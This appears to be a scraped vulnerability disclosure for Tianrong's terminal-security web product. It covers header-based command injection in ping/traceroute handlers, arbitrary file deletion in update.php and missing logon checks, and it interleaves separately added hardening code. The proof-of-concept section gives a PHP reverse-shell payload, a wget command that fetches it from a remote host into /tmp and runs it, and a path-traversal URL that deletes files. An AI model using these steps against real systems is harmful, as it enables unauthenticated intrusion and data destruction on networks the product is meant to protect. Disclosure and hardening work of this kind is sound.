Tianrong top five high-risk vulnerability Gift Packs final edition (No Logon required)

Source: Internet
Author: User
Tags: openssl enc


Tianrong's terminal-security product ships a gift pack of high-risk vulnerabilities: command execution, arbitrary file deletion, a global design defect, and more. None of them requires logging on, and a shell was obtained.

0x01 Multiple command execution vulnerabilities

File: direct/polling/CommandsPolling.php

    <?php
    include_once 'command/CCmdsPolling.php';
    $command  = isset($_POST['command'])  ? $_POST['command']  : "";
    $saveFile = isset($_POST['filename']) ? $_POST['filename'] : "";
    $cmdParam = isset($_POST['cmdParam']) ? $_POST['cmdParam'] : "";
    $cmdParam = trim($cmdParam);
    $faultStr = json_encode(array('type'=>'event', 'name'=>'message', 'data'=>array("exception", "", "")));
    // command is null
    if(empty($command)) {
        echo $faultStr;
        exit();
    }
    // exec and get result
    $result = array();
    $pollingObj = new CCmdsPolling();
    if($command == "ping") {
        $result = $pollingObj->getPingInfo($cmdParam, $saveFile);
    } else if ($command == "traceroute") {
        $result = $pollingObj->getTracerouteInfo($cmdParam, $saveFile);
    } else {
        echo $faultStr;
        exit();
    }



First command execution:

When $command = "ping", $cmdParam and $saveFile enter the getPingInfo function.

Follow up in file command/CCmdsPolling.php:

    function getPingInfo($pingIp, $saveFile)
    {
        $info = array();
        if(empty($saveFile)) {
            $saveFile = self::ping($pingIp); // first call: run the command and generate the result file
        }
        ......



When $saveFile is empty, continue into the ping function:
 

    function ping($ip)
    {
        if(empty($ip))
            return "";
        $filename = "/tmp/" . self::getClientAddr() . "ping" . $ip . ".txt";
        if($ip && $filename) {
            if(file_exists($filename)) {
                unlink($filename);
            }
            $cmd = "ping -c 5 $ip > $filename  2>&1 &";
            exec("$cmd ");
        }
        return $filename;
    }



Note the line $filename = "/tmp/" . self::getClientAddr() . "ping" . $ip . ".txt";

Continue into the getClientAddr function:

    function getClientAddr()
    {
        unset($onlineip);
        if($_SERVER['HTTP_CLIENT_IP']) {
            $onlineip = $_SERVER['HTTP_CLIENT_IP'];
        } else if($_SERVER['HTTP_X_FORWARDED_FOR']) {
            $onlineip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        } else {
            $onlineip = $_SERVER['REMOTE_ADDR'];
        }
        return $onlineip;
    }



The IP address is taken straight from the request headers and returned. Because it comes from $_SERVER rather than GET/POST/COOKIE, the system's GPC = on (magic_quotes_gpc) setting does not touch it.

In the end $filename is controllable and is executed in exec().
Of course, the IP address here also enters $cmd and is executed in exec(), but that IP-address issue has already been submitted by someone else.
Second command execution:

When $command = "traceroute", $cmdParam and $saveFile enter the getTracerouteInfo function.

Follow up with the getTracerouteInfo function in file command/CCmdsPolling.php:

    function getTracerouteInfo($address, $saveFile)
    {
        $info = array();
        if(empty($saveFile)) {
            $saveFile = self::traceroute($address); // first call: run the command and generate the result file
        }
        ......



Follow up the traceroute function:

    function traceroute($address)
    {
        if(!$address)
            return "";
        $filename = "/tmp/" . self::getClientAddr() . "traceroute" . $address . ".txt";
        if($address && $filename) {
            if(file_exists($filename)) {
                unlink($filename);
            }
            $cmd = "traceroute -m " . self::trace_max_hops . " -n $address > $filename 2>&1 &";
            exec("$cmd ");
        }
        return $filename;
    }



Note the line $filename = "/tmp/" . self::getClientAddr() . "traceroute" . $address . ".txt";

Continue into the getClientAddr function:

    function getClientAddr()
    {
        unset($onlineip);
        if($_SERVER['HTTP_CLIENT_IP']) {
            $onlineip = $_SERVER['HTTP_CLIENT_IP'];
        } else if($_SERVER['HTTP_X_FORWARDED_FOR']) {
            $onlineip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        } else {
            $onlineip = $_SERVER['REMOTE_ADDR'];
        }
        return $onlineip;
    }



The IP address is taken straight from the request headers and returned. Because it comes from $_SERVER rather than GET/POST/COOKIE, the system's GPC = on (magic_quotes_gpc) setting does not touch it.

In the end $filename is controllable and is executed in exec().
Of course, the IP address here also enters $cmd and is executed in exec(), but that IP-address issue has already been submitted by someone else.
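A hardened version of the same ping/traceroute dispatcher, added here as an example and not the product's own code: the target is validated before it reaches the shell, the result path is derived only from the server-set REMOTE_ADDR, and every argument is passed through escapeshellarg(). The result directory, the fixed hop limit and the function names are assumptions; the logon check belongs in front of it.

```php
<?php
// Added hardening example; not the product's own code. Assumed: a dedicated
// result directory and a fixed hop limit (the original used self::trace_max_hops).
const RESULT_DIR     = '/tmp/polling';
const TRACE_MAX_HOPS = 30;

// Accept only a literal IP address or a syntactically valid hostname, so
// shell metacharacters never reach the command line.
function validTarget(string $t): bool {
    if ($t === '' || strlen($t) > 253) return false;
    if (filter_var($t, FILTER_VALIDATE_IP) !== false) return true;
    $label = '[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?';
    return (bool) preg_match("/^($label\\.)*$label\$/i", $t);
}

// Build the result path from REMOTE_ADDR only (set by the web server, unlike
// Client-IP / X-Forwarded-For) and from hashes, so no request byte lands in it.
function resultFile(string $tool, string $target): string {
    $client = $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0';
    return RESULT_DIR . '/' . $tool . '_' . bin2hex($client) . '_' . hash('sha256', $target) . '.txt';
}

function runProbe(string $tool, string $target): string {
    if (!in_array($tool, ['ping', 'traceroute'], true)) throw new InvalidArgumentException('bad tool');
    if (!validTarget($target)) throw new InvalidArgumentException('bad target');
    if (!is_dir(RESULT_DIR) && !mkdir(RESULT_DIR, 0700, true)) throw new RuntimeException('no result dir');
    $file = resultFile($tool, $target);
    if (file_exists($file)) unlink($file);      // only ever a file this code created
    $argv = $tool === 'ping'
        ? ['ping', '-c', '5', $target]
        : ['traceroute', '-m', (string) TRACE_MAX_HOPS, '-n', $target];
    // Each argument and the output path are single-quoted for the shell.
    $cmd = implode(' ', array_map('escapeshellarg', $argv))
         . ' > ' . escapeshellarg($file) . ' 2>&1 &';
    exec($cmd);
    return $file;
}

$command = $_POST['command'] ?? '';
$target  = trim($_POST['cmdParam'] ?? '');
try {
    echo json_encode(['type' => 'event', 'name' => 'message',
                      'data' => basename(runProbe($command, $target))]);
} catch (Exception $e) {
    http_response_code(400);
    echo json_encode(['type' => 'event', 'name' => 'message', 'data' => 'exception']);
}
```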

0x02 Arbitrary file deletion in multiple places

First file deletion:

File: task/webapi/update.php

    <?php
    require_once("datalayer/CDatalayer.php");
    include_once "base/CShellExec.php";
    $shell = new CShellExec();
    $dl = new DataLayer();
    $cn = $dl->connectDB();
    $dl->queryDB($cn, "use scandb");
    $dl->queryDB($cn, "delete from t_pluginadding");
    $success = false;
    $result = $dl->queryDB($cn, "select * from t_SystemProperty where System_Property='vul_current_version'");
    $row = $dl->fetchArray($result);
    $vulCurrentVersion = $row["System_Value"];
    $dl->queryDB($cn, "update t_SystemProperty set System_value='$vulCurrentVersion' where System_Property='vul_old_version'");
    set_time_limit(0);
    if($_GET["package"]) {
        $filename = $_GET["package"];
        $tmpFilename = "/tmp/update_" . time() . ".des";
        $filename = trim($filename, "\\");
        $filename = "/tmp/" . $filename;
        $cmd = "/usr/sbin/openssl enc -des -d -a -in " . $filename . " -out " . $tmpFilename . " -pass pass:[email protected]";
        $shell->Execute($cmd, "", true);
        $dirname = $tmpFilename . ".dir";
        mkdir($dirname, 0777);
    } else {
        ......
    }
    ......
    unlink($filename);
    unlink($tmpFilename);
    system("rm -rf " . $dirname);
    echo $success;
    ?>



You can see $filename = $_GET["package"];

After some operations there is no exit.

Finally, $filename enters unlink(), so any file can be deleted.
Of course, commands are executed here as well, in $shell->Execute.

Since someone has already submitted that, I will not repeat it.

Second and third file deletions:

File: direct/polling/CommandsPolling.php

    <?php
    include_once 'command/CCmdsPolling.php';
    $command  = isset($_POST['command'])  ? $_POST['command']  : "";
    $saveFile = isset($_POST['filename']) ? $_POST['filename'] : "";
    $cmdParam = isset($_POST['cmdParam']) ? $_POST['cmdParam'] : "";
    $cmdParam = trim($cmdParam);
    $faultStr = json_encode(array('type'=>'event', 'name'=>'message', 'data'=>array("exception", "", "")));
    // command is null
    if(empty($command)) {
        echo $faultStr;
        exit();
    }
    // exec and get result
    $result = array();
    $pollingObj = new CCmdsPolling();
    if($command == "ping") {
        $result = $pollingObj->getPingInfo($cmdParam, $saveFile);
    } else if ($command == "traceroute") {
        $result = $pollingObj->getTracerouteInfo($cmdParam, $saveFile);
    } else {
        echo $faultStr;
        exit();
    }



The $cmdParam and $saveFile parameters enter the getPingInfo and getTracerouteInfo functions respectively.

Follow up with the getPingInfo and getTracerouteInfo functions:

    function getPingInfo($pingIp, $saveFile)
    {
        $info = array();
        if(empty($saveFile)) {
            $saveFile = self::ping($pingIp); // first call: run the command and generate the result file
        }
        ......
    }
    ......
    function ping($ip)
    {
        if(empty($ip))
            return "";
        $filename = "/tmp/" . self::getClientAddr() . "ping" . $ip . ".txt";
        if($ip && $filename) {
            if(file_exists($filename)) {
                unlink($filename);
            }
            $cmd = "ping -c 5 $ip > $filename 2>&1 &";
            exec("$cmd ");
        }
        return $filename;
    }
    ......
    function getClientAddr()
    {
        unset($onlineip);
        if($_SERVER['HTTP_CLIENT_IP']) {
            $onlineip = $_SERVER['HTTP_CLIENT_IP'];
        } else if($_SERVER['HTTP_X_FORWARDED_FOR']) {
            $onlineip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        } else {
            $onlineip = $_SERVER['REMOTE_ADDR'];
        }
        return $onlineip;
    }



In getPingInfo, when $saveFile is empty the ping function is entered.

Then, in the ping function:

$filename = "/tmp/" . self::getClientAddr() . "ping" . $ip . ".txt";

The getClientAddr function takes the IP address from $_SERVER and returns it,

so GPC is bypassed here even though this system runs with GPC = on.

Finally, $filename in the ping function is controllable, and $filename enters the unlink function.

The $filename value can be truncated with %00, so arbitrary files can be deleted.
The third place is the same as the second.

In the traceroute function, $filename is controllable and $filename enters the unlink function.

The $filename value can be truncated with %00, so arbitrary files can be deleted.
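An added example, not the product's code, of confining the package name from update.php to one directory before it reaches openssl or unlink(); it also rejects the NUL byte behind the %00 truncation. The update directory, the passphrase source and the function names are assumptions, and the demonstration inputs are constructed.

```php
<?php
// Added example; not the product's own code. Assumed: packages live in
// UPDATE_DIR and the passphrase comes from configuration, not a literal.
const UPDATE_DIR = '/tmp/update';

// Resolve $name to an existing regular file inside UPDATE_DIR, or null.
function confinedPath(string $name): ?string {
    // A NUL byte is rejected up front: old PHP truncated paths at it (the %00
    // trick in the write-up), newer PHP throws; neither should reach the FS.
    if ($name === '' || strpos($name, "\0") !== false) return null;
    // Only a bare file name: no slashes, no "." or "..".
    if (basename($name) !== $name || $name === '.' || $name === '..') return null;
    $base = realpath(UPDATE_DIR);
    $path = realpath(UPDATE_DIR . '/' . $name);
    if ($base === false || $path === false) return null;
    // realpath() resolves symlinks, so a link pointing outside is caught too.
    if (strncmp($path, $base . '/', strlen($base) + 1) !== 0) return null;
    return is_file($path) ? $path : null;
}

// The openssl invocation with every user-influenced piece quoted.
function decryptPackage(string $name, string $passphrase): ?string {
    $in = confinedPath($name);
    if ($in === null) return null;
    $out = UPDATE_DIR . '/update_' . bin2hex(random_bytes(8)) . '.des';
    $cmd = '/usr/sbin/openssl enc -des -d -a -in ' . escapeshellarg($in)
         . ' -out ' . escapeshellarg($out)
         . ' -pass ' . escapeshellarg('pass:' . $passphrase);
    exec($cmd, $output, $rc);
    return $rc === 0 ? $out : null;
}

// Cleanup that can only remove what confinedPath() vouches for.
function removePackage(string $name): bool {
    $path = confinedPath($name);
    return $path !== null && unlink($path);
}

// Constructed demonstration inputs: the traversal form from the write-up,
// a NUL-truncation attempt and a plain name.
$samples = ['../../../../../../../tmp/1', "x.des\0.txt", 'update.des'];
foreach ($samples as $s) {
    printf("%-32s => %s\n", addcslashes($s, "\0"), confinedPath($s) ?? 'rejected');
}
```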

0x03 Global design defect

Why global? Because this is a security product, every function that does anything should be a post-logon operation.

Yet the functions concerned do not verify the logon status at all.

So the functions of nearly every page can be used without logging on.

The system does have a global logon-verification function:

For example, in the file direct/polling/progressbarPolling.php:

    if(!($userName = GetSessionVariable('username'))) { // get the logged-on user name
        echo json_encode(array('type'=>'event', 'name'=>'np_probe_device_alive_event', 'data'=>false));
        exit();
    }



The logon status is verified here: if the session contains no username, the script exits. Look at the GetSessionVariable function.

File: base/session.php

    function GetSessionVariable($key)
    {
        return $_SESSION[netpower][$key];
    }



It reads userName from the session.

However, this check is absent from more than 95% of the pages.

For example, device/device_export.php exports device information directly.

distribute/vuldetial.php exposes plug-in vulnerability information.

policy/param_export.php exports policy information.

task/task_export.php exports task information.

And so on.
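The fix for a defect like this is one gate that runs before every page rather than a check each page may forget. The following is an added example, not the product's code; it assumes base/session.php provides the GetSessionVariable() shown above, that the file is loaded through php.ini's auto_prepend_file, and that PUBLIC_PAGES lists the only scripts reachable without a session.

```php
<?php
// Added example; not the product's own code. One gate that runs before every
// page instead of the per-file check in progressbarPolling.php. Assumed: this
// file is loaded via php.ini's auto_prepend_file, and PUBLIC_PAGES lists the
// only scripts reachable without a session.
require_once __DIR__ . '/base/session.php';   // provides GetSessionVariable()

const PUBLIC_PAGES = ['/login.php', '/logout.php'];

// Pure decision: allow when the script is public or a user is logged on.
function requestAllowed(string $script, $userName): bool {
    if (in_array($script, PUBLIC_PAGES, true)) return true;
    return is_string($userName) && $userName !== '';
}

function enforceLogin(): void {
    if (session_status() !== PHP_SESSION_ACTIVE) session_start();
    $script = $_SERVER['SCRIPT_NAME'] ?? '';
    if (requestAllowed($script, GetSessionVariable('username'))) return;
    // Fail closed before any export, delete or exec code on the page runs.
    http_response_code(401);
    if (stripos($_SERVER['HTTP_ACCEPT'] ?? '', 'application/json') !== false) {
        header('Content-Type: application/json');
        echo json_encode(['type' => 'event', 'name' => 'message', 'data' => false]);
    } else {
        header('Location: /login.php');
    }
    exit;
}

enforceLogin();
```

With auto_prepend_file pointing at this file, no script such as device/device_export.php or task/webapi/update.php can execute without passing enforceLogin() first.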

Proof of command execution:

When command = ping, filename is empty and cmdParam is not empty.

1. Place shell.php on a VPS with the following content:

    <?php
    $sock = fsockopen("*.*.*.*", 61234);
    exec("/bin/sh -i <&3 >&3 2>&3");
    ?>



2. Run the following command here to download shell.php into the target's tmp directory:

    wget http://*.*.*.*:8888/shell.php -O /tmp/shell.php

3. Run the following command to execute the downloaded /tmp/shell.php:

    php -f /tmp/shell.php

4. The reverse shell comes back successfully.

The same holds when command = traceroute.



Proof of file deletion:

Because of the design defect, a file can be uploaded without logging on.

File: device/device_import.php

    <?php
    /** Upload File */
    $UploadAction = 0;
    $TimeLimit = 60; /* set the time-out limit. The default is 30 seconds; 0 means unlimited. */
    set_time_limit($TimeLimit);
    if(move_uploaded_file($_FILES["importUpload"]["tmp_name"], "/tmp/" . $_FILES["importUpload"]["name"])) {
        chmod("/tmp/" . $_FILES["importUpload"]["name"], 0777);
        echo '{success: true, file :' . json_encode('file has been stored :' . '/tmp/' . $_FILES['importUpload']['name']) . '}';
    } else {
        echo '{faliure: true, file: Upload Error !}';
    }
    set_time_limit(30); // restore the default timeout setting
    ?>



Upload the file to tmp.

Uploaded successfully.

Send the request:

    **.**.**.**/task/webapi/update.php?package=../../../../../../../tmp/1

This deletes the file /tmp/1.

Deleted.
